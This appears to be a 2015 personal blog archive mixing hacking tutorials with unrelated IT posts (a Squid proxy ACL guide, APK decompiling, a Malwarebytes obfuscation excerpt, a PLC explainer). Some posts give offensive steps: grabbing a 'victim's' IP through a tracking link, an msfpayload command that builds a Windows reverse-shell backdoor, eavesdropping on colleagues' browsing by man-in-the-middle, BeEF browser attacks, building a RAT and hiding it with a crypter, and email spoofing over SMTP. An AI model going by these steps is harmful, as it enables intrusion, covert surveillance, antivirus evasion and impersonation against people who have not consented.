Saturday, May 30, 2015

Get the IP of some one using a link

Go to this site
http://blasze.tk

and enter a URL to redirect the victim. Then you will receive a code to track the IP of the victim's. Use the code to get the IP of the Victim.

Friday, May 29, 2015

How to make a Squid server and apply Rules


Proxy servers operate as an intermediary between a local network and Internet. Requests from local clients for web services can be handled by the proxy server. Squid is a high-performance HTTP and FTP caching proxy server. It is also known as a Web proxy cache. As it stores data from frequently used Web pages and files, it can often give your users the data they need without their systems having to look to the Internet.
So let's begin the tutorial.
Firstly we should install the squid in our linux system.
It's different from each linux dist but here i will get the ubuntu OS for example. And there is no more difference on these steps just browse over internet to know how to install squid to your linux OS.

Ok get the terminal and type
apt-get install squid3

As i said this is for ubuntu. apt-get install will remains as same in other Linux OSs. But dunno about squid.

Then we have to set a static IP to our server. Go to System Settings and Networks. You can change the IP, Gateway, DNS there without bothering of the commands in the terminal.

To check surely the Squid has installed in the system go to etc folder in file system or root. Try to find something like squid. In this case it's "squid3".

Go to the terminal and type

sudo nano /etc/squid3/squid.conf

Using this command we are going to open the squid.conf with nano for editing purpose. 
Then you will see a more than 5000 lines of doc in there.
press ctrl+w and searching menu will appear. type visible_hostname. It will go to the point that phrase exist and when you slowly scroll down you will see under the  default: , after the visible_hostname localhost or something. Give it a desired name or it's better to use your machine host name (type in the terminal hostname and enter.)

Again press ctrl+w and type to search tag: acl.
now we are going to build access control list. In this scenario i'm going to do this.
  • block internet to 192.168.100.250
  • allow internet to all of other network users
  • but block www.facebook.com for every user

So lets we write a ACL to achieve these settings
scroll down after pointing the tag: acl. after default: you will see there is a acl as "acl all src all".This is default. Now i'm gonna write following ACLs.

acl deny_host src 192.168.100.250
acl allow_network src 192.168.100.0/24
acl deny_web dstdomain "/etc/squid3/deny_web"
acl all src all  - this is default one

src=source dst=destination dstdomain=destination domain
This is how we write acl to achieve above internet filtering. In the last acl we have open a acl called "deny_web" and we suggest it to look for certain destination domains where in /etc/squid3/deny_web. This was not in that folder but we are creating this to add the domains that we want to block. When you go to that directory you can see deny_web.conf file has there.

Are we done???
no we have to assign those ACLs to http access list. In acl list we are only saying to the squid "hey squid you are going inspect on these elements with these parameters". How we say to squid "don't allow these elements but you should allow these eliments through you". This is how it's gonna happen.

again ctrl+w search for tag: http_access. scroll down and after default: you will see there already an access rule saying http_access deny all. Remember this is the most important part. You should aware about this allow and deny. keep the http_access deny all at the bottom every time. It should be there. Or else there should be allow all. But if we want to permit only trusted connections and we want to abort all others deny all is huge privilege. Remember, squid read this rules top to bottom. So top one gets high priority.I will say you a simple trick to get easy with these rules.

Let assume you are in a position which is all post cards from your country(let say US) inspected by you. You got a following list to filter out the post cards.
  • Deny post cards from New York.
  • Deny post cards to new delhi in India
  • Allow post cards from America
  • Deny any
Let's say accidentally you got a post card that has "from: Ottawa,Canada to: colombo,sri lanka

ok you look at the list will see is it from new york? no.Is it to delhi in India? no. Is it from America? no. Then you see deny any. So you drop the post card. Let's say you are getting post card "from : Virginia,America to : Delhi,India". So you look at the list...Is it from New york? no. Is it to Delhi in India? oops.yes. it is. So you drop it. Because it says deny post cards to New Delhi in India. The important thing is you are not going to look at the third rule. "Allow post cards from America". Because you give high priority for top rules. Is it from America? yes it is. But it was not in the top of the other rules. So now you have dropped it. The Squid server (and most of ACLs) following like this method. It's agree with the first rule that's gonna be "true" with the situation by looking IP addresses, domain names, ports and other things inside the request packets and it will pass through it or block.
So let's make the Http_access list

http_access deny deny_host
http_access deny deny_web
http_access allow allow_network
http_access deny all

ok now you finish.
press ctrl+x and ask are you sure to save this changes. Give Y and press enter.

Now you should input what sites are going to block under the deny_web acl. To do that get the terminal and type sudo nano /etc/squid3/deny_web

then enter the web site to block. As to our example www.facebook.com. Type it and ctrl+x press y to save and press enter.

now you are done. Go to client machines and go to Internet Properties > Connections > LAN Settings . Tick "Use a proxy server for your LAN" and enter the IP of the server. And the port you can find go to server get the terminal and type nano /etc/squid3/squid.conf and ctrl+w , search for http_port. 
There you will see what port squid is listening. Enter that port on the port: text box of proxy settings of the client machine. So check it out.

Thursday, May 28, 2015

Hack Windows machines using a trojan made by Kali

Hack Any Windows 7 With Metasploit

In this tutorial I will exploit a Windows 7 Sp1 OS using Metasploit. I will be using the exploit/multi/handler module which “provides all of the features of the Metasploit payload system to exploits that have been launched  outside of the framework“

Before we fire up Metasploit, we need to create a payload in order to gain a meterpreter shell. To create a payload type this in the terminal without the quotes:


msfpayload windows/meterpreter/reverse_tcp LHOST=”your Local IP” LPORT=”listening port” x > /root/backdoor.exe




I used port 4444 (you can choose your own port) for the LPORT which is the listening port and set the LHOST to the IP of the remote attacker which is obviously your Local IP address, my IP is 192.168.10.5.




How to look what's browsing your colleague (Man in the middle attack)

How about you can eavesdrop what are your office colleagues browsing on Internet...

To do this we are using basically 2 tools in kali.

  1. Ettercap
  2. Xplico
Xplico is not coming inbuilt manner in kali. In Back track it's in-built. For kali you have to install it. So to do it follow..

type in Terminal,,,

apt-get update
apt-get install xplico

Now go to Application > kali linux > Information Gathering > Traffic Analysis 

There you will see "Xplico" , "Xplico start" , "Xplico stop"

To start Xplico firstly you have to start Apache2

Tuesday, May 26, 2015

APK decompile and recompile

Go to this site to download the relevant tools.

http://forum.xda-developers.com/showthread.php?t=2251719

download the full   Apktool & baksmali/smali + Signer for all GB/ICS/JB/KK ROM v3 (4.4 Kitkat support/optimized)



  • extract it to a desired folder.
  • download the framework-res.apk and copy it to the same place that extracted.
  • And also copy paste the .apk file.
  • shift+right click on the window.
  • click open command window here.
  • cmd will open now.
  • type on cmd apktool if framework-res.apk
  • then type apktool d "your apk file name"
  • press enter, it will have been decompiled and there will be a new  folder which contains the decompiled files.

to recompile the edited apk folder content...get cmd and type

  • apktool b -f -d "your apk file name"
  • go to the folder that contents have of the real apk (decompiled) and go to the dist folder. There will have the apk file.

Browser attacks using BeEf


To this browser attack gonna use not only the Beef but also Metasploit.

Open shell, type and go as follows..

cd /usr/share/beef-xss

ls

in the list you can see config.yaml file. Copy the name and paste the name after nano.

nano config.yaml

scroll down and look at "metasploit enable : false"
you have to erase the "false" and make it "true"
then its looks like enable : true
press ctrl + x
type y
press enter

continue typing

Hiding Malware from the Anti-virus


Creating Malware

You can create the malware for this test using the Apocalypse RAT. It's easy to build RATs. Don't need to explain how you will know after download it.

Crypters

Normally to made the malware undetectable crypters are used. but the case is when a crypter is built by programmer and when it's getting to use over the world, it becomes popular and anti-virus system getting the signatures of its and the files created using that crypter will detected by anti-virus systems. So a crypter which popular will not survive for a long.FUD (Fully UnDetectable) manner.

So what we gonna do

There is a crypter called "Aegis crypter". The important of this crypter is it's updating the stubs and also there are numerous features using to bypass the anti-virus. So this gonna be a greate crypter for creating FUD malwares.

It can download here.

Thursday, May 21, 2015

How to spoof Email address



What is Email spoofing..

Email spoofing is send an email to a specific recipient as it was sent FROM a different person's email address. If i want to send a fake mail to sample1@email.com as it was sent from sample2@email.com , this technique becomes handy.

Try this in your office.

Step 1

Open cmd and telnet your mail server with your outgoing mail port. Mostly the outgoing mail port should be 25 (SMTP port).

ex:

If the email to be spoofed is in the mail server on mail.office.com and it's outgoing mail port is 25 type as follows on cmd

telnet mail.office.com 25

and enter.

Wednesday, May 20, 2015

Obfuscation: Malware’s best friend


Here at Malwarebytes, we see a lot of malware. Whether it’s a botnet used to attack web servers or a ransomware stealing your files, much of today’s malware wants to stay hidden during infection and operation to prevent removal and analysis. Malware achieves this using many techniques to thwart detection and analysis—some examples of these include using obscure filenames, modifying file attributes, or operating under the pretense of legitimate programs and services. In more advanced cases, the malware might attempt to subvert modern detection software (i.e. MBAM) to prevent being found, hiding running processes and network connections. The possibilities are quite endless.
Despite advances in modern malware, dirty programs can’t hide forever.  When malware is found, it needs some additional layers of defense to protect itself from analysis and reverse engineering.  By implementing additional protection mechanisms, malware can be more difficult to detect and even more resilient to takedown.  Although a lot of tricks are used to hide malware’s internals, a technique used in nearly every malware is binary obfuscation.
Obfuscation (in the context of software) is a technique that makes binary and textual data unreadable and/or hard to understand.  Software developers sometimes employ obfuscation techniques because they don’t want their programs being reverse-engineered or pirated.

Monday, May 18, 2015

What Is A Programmable Logic Controller (PLC)?

What Is A Programmable Logic Controller (PLC)?

 

 What Is A PLC?

PROGRAMMABLE LOGIC CONTROLLER (PLC) is an industrial computer control system that continuously monitors the state of input devices and makes decisions based upon a custom program to control the state of output devices.
Almost any production line, machine function, or process can be greatly enhanced using this type of control system. However, the biggest benefit in using a PLC is the ability to change and replicate the operation or process while collecting and communicating vital information.
Another advantage of a PLC system is that it is modular. That is, you can mix and match the types of Input and Output devices to best suit your application.

 History of PLCs

The first Programmable Logic Controllers were designed and developed by Modicon as a relay re-placer for GM and Landis.
  • These controllers eliminated the need for rewiring and adding additional hardware for each new configuration of logic.
  • The new system drastically increased the functionality of the controls while reducing the cabinet space that housed the logic.
  • The first PLC, model 084, was invented by Dick Morley in 1969
  • The first commercial successful PLC, the 184, was introduced in 1973 and was designed by Michael Greenberg.

     

 What Is Inside A PLC?

inside of a plc
The Central Processing Unit, the CPU, contains an internal program that tells the PLC how to perform the following functions:
  • Execute the Control Instructions contained in the User's Programs. This program is stored in "nonvolatile" memory, meaning that the program will not be lost if power is removed
  • Communicate with other devices, which can include I/O Devices, Programming Devices, Networks, and even other PLCs.
  • Perform Housekeeping activities such as Communications, Internal Diagnostics, etc.

 How Does A PLC Operate?

There are four basic steps in the operation of all PLCs; Input Scan, Program Scan, Output Scan, and Housekeeping. These steps continually take place in a repeating loop.
Four Steps In The PLC Operations
1.) Input Scan
  • Detects the state of all input devices that are connected to the PLC
2.) Program Scan
  • Executes the user created program logic
3.) Output Scan
  • Energizes or de-energize all output devices that are connected to the PLC.
4.) Housekeeping
  • This step includes communications with programming terminals,
    internal diagnostics, etc...
programmable logic controller operation
These steps are continually
processed in a loop.

 What Programming Language Is Used To Program A PLC?

While Ladder Logic is the most commonly used PLC programming language, it is not the only one. The following table lists of some of languages that are used to program a PLC.
Ladder Diagram (LD) Traditional ladder logic is graphical programming language. Initially programmed with simple contacts that simulated the opening and closing of relays, Ladder Logic programming has been expanded to include such functions as counters, timers, shift registers, and math operations.
Function Block Diagram (FBD) - A graphical language for depicting signal and data flows through re-usable function blocks. FBD is very useful for expressing the interconnection of control system algorithms and logic.
Structured Text (ST) – A high level text language that encourages structured programming. It has a language structure (syntax) that strongly resembles PASCAL and supports a wide range of standard functions and operators. For example;
If Speed1 > 100.0 then
    Flow_Rate: = 50.0 + Offset_A1;
Else
    Flow_Rate: = 100.0; Steam: = ON
End_If;
Instruction List (IL): A low level “assembler like” language that is based on similar instructions list languages found in a wide range of today’s PLCs.
LD
MPC
LD
ST
RESET:
ST
 R1
RESET
PRESS_1
MAX_PRESS
LD    0
A_X43
 
Sequential Function Chart (SFC) A method of programming complex control systems at a more highly structured level. A SFC program is an overview of the control system, in which the basic building blocks are entire program files. Each program file is created using one of the other types of programming languages. The SFC approach coordinates large, complicated programming tasks into smaller, more manageable tasks.

 What Are Input/Output Devices?

INPUTS
OUTPUTS
– Switches and Pushbuttons
– Sensing Devices
 • Limit Switches
• Photoelectric Sensors
• Proximity Sensors
photoelectric sensors
– Valves
– Motor Starters
– Solenoids
– Acuators
valves
– Conditon Sensors
– Encoders
 • Pressure Switches
• Level Switches
• Temperature Switches
• Vacuum Switches
• Float Switches
amci duracoder
– Horns and Alarms
– Stack lights
– Control Relays
– Counter/Totalizer 
– Pumps 
– Printers
– Fans
stack lights

 What Do I Need To Consider When Choosing A PLC?

There are many PLC systems on the market today. Other than cost, you must consider the following when deciding which one will best suit the needs of your application.
  • Will the system be powered by AC or DC voltage?
  • Does the PLC have enough memory to run my user program?
  • Does the system run fast enough to meet my application’s requirements?
  • What type of software is used to program the PLC?
  • Will the PLC be able to manage the number of inputs and outputs that my application requires?
  • If required by your application, can the PLC handle analog inputs and outputs, or maybe a combination of both analog and discrete inputs and outputs?
  • How am I going to communicate with my PLC?
  • Do I need network connectivity and can it be added to my PLC?
  • Will the system be located in one place or spread out over a large area?

 PLC Acronyms

The following table shows a list of commonly used Acronyms that you see when researching or using your PLC.
    ASCIIAmerican Standard Code for Information Interchange
    BCDBinary Coded Decimal
    CSACanadian Standards Association
    DIODistributed I/O
    EIAElectronic Industries Association
    EMIElectroMagnetic Interference
    HMIHuman Machine Interface
    IECInternational Electrotechnical Commission
    IEEEInstitute of Electrical and Electronic Engineers
    I/OInput(s) and/or Output(s)
    ISOInternational Standards Organization
    LLLadder Logic
    LSBLeast Significant Bit
    MMIMan Machine Interface
    MODICONMOdular DIgital CONtoller
    MSBMost Significant Bit
    PIDProportional Integral Derivative (feedback control)
    RFRadio Frequency
    RIORemote I/O
    RTURemote Terminal Unit
    SCADASupervisory Control And Data Acquisition
    TCP/IPTransmission Control Protocol / Internet Protocol
     
portions of this tutorial contributed by www.modicon.com and www.searcheng.co.uk
A small number of U.S. based tech companies design, manufacture and sell PLC modules. Advanced Micro Controls Inc (AMCI) is such a company, specializing in Position Sensing interfaces and Motion Control modules.
The company's products are listed below for your reference:
AMCI PLC Modules Index: Allen-Bradley | GE Fanuc | Schneider (please scroll to view)
 
Allen-Bradley:
ControlLogix PLC
CompactLogixPLC
MicroLogix 1500 PLC
POINT I/O
 
SLC500 PLC
PLC-5 PLC
  
  
 
GE Fanuc:
GE Fanuc 90-30 Series PLC
GE Fanuc 90-70 Series PLC
  
amci modules for ge fanuc 90-30 plc
   Resolver Interface
   SSI/LDT Interface
amci modules for ge fanuc 90-70 plcs
   Resolver Interface
   SSI/LDT Interface
   PLS Controllers
  
 
Schneider Automation:
Modicon
Quantum PLC
Square D
SY/MAX PLC
  
amci modules for ge fanuc 90-30 plc
   Resolver Interface
amci modules for square d sy/max plc
   Resolver Interface